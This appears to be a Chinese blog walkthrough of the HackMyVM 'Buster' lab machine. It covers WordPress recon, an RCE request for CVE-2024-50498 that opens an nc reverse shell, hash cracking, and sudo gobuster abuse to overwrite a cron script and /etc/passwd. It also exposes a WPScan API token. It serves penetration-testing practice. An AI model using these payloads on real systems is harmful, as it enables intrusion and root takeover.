Buster

First Post:

2025-01-24

Last Update:

2025-01-24

Word Count:

2.2k

Read Time:

11 min

Page View: loading...

buster

VMware 和 Oracle VM VirtualBox 网络互通（kali 与 vulnhub靶机互通） - kazie - 博客园

RandomRobbieBF/CVE-2024-50498: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution

linux反弹shell优化方案和tty_哔哩哔哩_bilibili

Web 扫描神器：Gobuster 保姆级教程（附链接）_gobuster 使用方法-CSDN博客

hackmyvm buster靶场复盘_哔哩哔哩_bilibili

信息收集

arp-scan -l
nmap -sS --min-rate 10000 -p- -Pn 192.168.56.103

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 04:53 EST
Nmap scan report for 192.168.56.103 (192.168.56.103)
Host is up (0.00037s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5C:C6:B4 (Oracle VirtualBox virtual NIC)

开启了http服务和ssh服务

登录到主页可以看到是一个wordpress的站点，插件识别出了版本，用wpscan扫一下

wpscan --api-token Kamq8tduzaf7zH0ILbVgBBfSY7sfFGpz03KB5wgk47Y --url http://192.168.56.103 -e u,ap --plugins-detection aggressive #用户以及插件枚举
wpscan --url http://192.168.56.103/ -e vp,u --api-token Kamq8tduzaf7zH0ILbVgBBfSY7sfFGpz03KB5wgk47Y #用户枚举以及检测插件的漏洞

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.103/ [192.168.56.103]
[+] Started: Thu Jan 23 07:07:16 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.103/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.103/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.103/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.103/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:02 <================================================================> (632 / 632) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:12:46 <=============================================================> (93977 / 93977) 100.00% Time: 00:12:46
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.103/wp-content/plugins/akismet/
 | Latest Version: 5.3.5 (up to date)
 | Last Updated: 2024-11-19T02:02:00.000Z
 | Readme: http://192.168.56.103/wp-content/plugins/akismet/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.103/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.103/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.103/wp-content/plugins/akismet/readme.txt

[+] feed
 | Location: http://192.168.56.103/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.103/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wp-query-console
 | Location: http://192.168.56.103/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.56.103/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.103/wp-content/plugins/wp-query-console/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.103/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.103/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Thu Jan 23 07:20:27 2025
[+] Requests Done: 95161
[+] Cached Requests: 17
[+] Data Sent: 25.432 MB
[+] Data Received: 53.921 MB
[+] Memory used: 440.824 MB
[+] Elapsed time: 00:13:11

Webshell

扫描到了两个用户，一个ta0和welcome，对其进行爆破密码

1	`wpscan --url http://192.168.56.103 --usernames ta0, welcome --passwords /path/to/wordlist.txt --api-token Kamq8tduzaf7zH0ILbVgBBfSY7sfFGpz03KB5wgk47Y`

发现爆破失败，上面的扫描结果中还包括了一个插件漏洞wp-query-console，网上搜索得到CVE-2024-50498

POC:

POST /wp-json/wqc/v1/query HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0

{"queryArgs":"phpinfo();","queryType":"post"}

我们在浏览器中访问/wp-json/wqc/v1/query，然后再yakit进行抓包，修改类型为post，发送格式为json，发送poc即可看到回显

搜索disable发现禁用了如下的函数，我们可以使用shell_exec执行命令，不过这个命令默认没有回显

passthru,exec,system,popen,chroot,scandir,chgrp,chown,escapesh

直接尝试反弹shell

POST /wp-json/wqc/v1/query HTTP/1.1
Host: 192.168.56.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"queryArgs":"shell_exec('nc -e /bin/bash 192.168.56.102 1234');","queryType":"post"}

得到终端后变为可视化更强并且可交互的终端形式（否则像mysql等需要交互的操作会卡死）

python -c "import pty;pty.spawn('/bin/bash')" #简易的方法，但不稳定

/usr/bin/script -qc /bin/bash /dev/null #变成交互shell，不保存日志
ctrl+z #中断
stty raw -echo;fg #接受所有的控制字符，拒绝输入回显，恢复中断的shell
reset
xterm #echo $$TERM根据自己的设置
export TERM=xterm 
stty rows 30 cols 145 #设置交互的终端大小，stty -a根据自己的设置

进入到home目录看到了一个welcome的文件夹

回到原来的文件目录查看文件目录，找到wp-config文件，查看找到了数据库的账号密码

mysql -u ll104567 -p
thehandsomeguy
show database;
use wordpress
show tables;
select * from wp_users;

得到了ta0和welcome密码的hash，使用john跑一下得到welcome的密码104567,登录到welcome账号

vim hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
su - welcome
bash

提权

找一下可以用sudo权限执行的程序,找到了一个gobuster

Gobuster 是一款用于目录和文件枚举的开源工具。它主要用于在Web应用程序或网站上查找隐藏的目录和文件，从而进行信息收集或渗透测试

welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster

方法一：

1代表本地，2代表远程

使用wget传上去一个pspy64看一下他现在在运行的程序，看到有一个定时任务/opt/.test.sh，无法查看内容，使用gobuster读取试一下，读取到了echo%20test，证明里面的内容就是echo test

1 python3 -m http.server 80
2 wget http://192.168.56.102/pspy64
2 chmod +x pspy64
2 ./pspy64
2 sudo gobuster -w /opt/.test.sh -u http://192.168.56.102 #默认模式为dir扫描目录文件w为指定字典，u指定url
1.192.168.56.104 - - [24/Jan/2025 06:21:00] "GET /echo%20test HTTP/1.1" 404 -

我们的目标是通过gobuster修改这个计划任务的内容，使其可以执行我们想要执行的内容

先进行尝试，首先在本地新建一个文件a，然后在远程的tmp目录下也新建一个a，传入的内容为a，返回了/a这个文件路径

2 echo 'a' > a
1  touch a
1 python3 -m http.server 80
2 sudo gobuster -w a -u http://192.168.56.102
2 sudo gobuster -w a -u http://192.168.56.102 -q -n #去除多余内容

在远程tmp目录下新建一个文件传入反弹shell的命令，利用gobuster修改.test.sh的内容去执行他，例如在tmp新建一个b，那么gobuster要返回的内容就要是/tmp/b要去构建这样的路径

1 mkdir tmp
1 cd tmp
1 touch b
2 echo 'nc -e /bin/bash 192.168.56.102 1234' > b
2 chmod 777 b
2 sudo gobuster -w a -u http://192.168.56.102:80 -q -n
/tmp/b
2 sudo gobuster -w a -u http://192.168.56.102:80 -q -n -o /opt/.test.sh
1 nc -lvnp 1234

等待执行命令即可获取shell

方法二：

构建一个类似于/etc/shadow的信息，相当于新增加了一个root用户

1 perl -e 'print crypt("1","aa")'
aacFCuAIHhrCM  
2 echo 'a:aacFCuAIHhrCM:0:0:x:/root:/bin/bash' > c
1 mkdir -p a:aacFCuAIHhrCM:0:0:x:/root:/bin/bash
2 sudo gobuster -w c -u http://192.168.56.102:80 -q -n
/a:aacFCuAIHhrCM:0:0:x:/root:/bin/bash
2 sudo gobuster -w c -u http://192.168.56.102:80 -q -n -o /etc/passwd
2 su - /a #密码1

≡